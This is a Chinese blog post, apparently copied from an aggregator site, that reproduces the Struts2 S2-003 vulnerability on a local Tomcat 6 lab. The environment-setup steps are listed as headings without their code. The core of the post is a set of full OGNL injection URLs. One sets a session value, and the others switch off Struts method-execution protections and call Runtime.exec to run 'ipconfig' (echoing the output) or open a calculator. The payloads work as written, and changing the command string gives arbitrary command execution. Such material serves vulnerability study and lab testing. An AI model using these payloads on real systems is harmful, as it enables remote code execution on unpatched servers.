Struts2 S2-003
来源:互联网 发布:淘宝微信返利机器人 编辑:程序博客网 时间:2024/06/05 09:45
Struts2 S2-003影响的版本是低于2.0.12以下的,所以搭建的环境使用低于2.0.12的最近一次版本,2.0.11.2。
环境搭建:
1.项目结构:
2.pom.xml里的配置:
3.web.xml的配置:
4.struts.xml的配置 :
5.LoginAction.java代码:
6.index.jsp的代码:
7.welcome.jsp的代码:
注意,tomcat-7.0.78本身限定了特殊字符;要验证此漏洞,需要使用tomcat6.0。
相关说明:
简单验证一下,在index.jsp加入如下代码:
默认情况下的展示如下:
访问如下url:
http://localhost:8080/LoginAction.action?('\u0023session[\'user\']')(unused)=0wn3d
则展示如下:
下面开始想一些高危的利用方法,比如执行一些命令。
如下为打印ipconfig:
http://localhost:8080/LoginAction.action?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(kxlzx)(kxlzx)&('\u0023_memberAccess.allowStaticMethodAccess\u003dtrue')(bla)(bla)&('\u0023mycmd\u003d\'ipconfig\'')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)')(bla)(bla)&(A)(('\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())')(bla))&(B)(('\u0023myres\u003dnew\40byte[51020]')(bla))&(C)(('\u0023mydat.readFully(\u0023myres)')(bla))&(D)(('\u0023mystr\u003dnew\40java.lang.String(\u0023myres)')(bla))&('\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()')(bla)(bla)&(E)(('\u0023myout.getWriter().println(\u0023mystr)')(bla))
打开计算器:
http://localhost:8080/LoginAction.action?('\u0023context[\'xwork.MethodAccessor.denyMethodExecution\']\u003dfalse')(bla)(bla)&('\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET')(kxlzx)(kxlzx)&('\u0023_memberAccess.allowStaticMethodAccess\u003dtrue')(bla)(bla)&('\u0023mycmd\u003d\'calc\'')(bla)(bla)&('\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)')(bla)(bla)
阅读全文
0 0
- Struts2 S2-003
- struts2 最新漏洞 S2
- struts2 exp S2-016
- struts2 S2-045漏洞
- struts2 s2-045初探
- Struts2 S2-052
- Struts2漏洞S2-016和S2-017
- struts2 s2-45漏洞利用
- Struts2 S2-052漏洞分析
- 知道struts2-s2-016-s2-017漏洞之感
- Struts2高危漏洞修复方案(S2-016/S2-017)
- Struts2 高危漏洞修复方案 (S2-016/S2-017)
- Struts2 高危漏洞修复方案 (S2-016/S2-017)
- Struts2 高危漏洞修复方案 (S2-016/S2-017)
- Struts2 高危漏洞修复方案 (S2-016/S2-017)
- Struts2 高危漏洞修复方案 (S2-016/S2-017)
- Struts2 高危漏洞修复方案 (S2-016/S2-017)
- Struts2 高危漏洞修复方案 (S2-016/S2-017)
- thinkphp5在php5.5+版本No input file specified问题解决
- Deeplab v2 调试全过程(Ubuntu 16.04+cuda8.0)
- Freemarker实现网页静态化
- SSM三层框架的构建(Spring,SpringMVC,MyBatis)
- python学习路线图(10/24)
- Struts2 S2-003
- 完美编写java中equals方法的建议
- mysql绿色版免安装指导
- js判断PC还是手机自动跳转代码
- 30 种 SQL 查询语句的优化方法
- C# 带参访问接口,WebClient方式
- maven项目中,项目上有红叉,但是文件上没有红叉,解决方法如下:
- node邮件发送(nodemailer)
- kernel4.x imx6 GPIOLIB_API 输出电平问题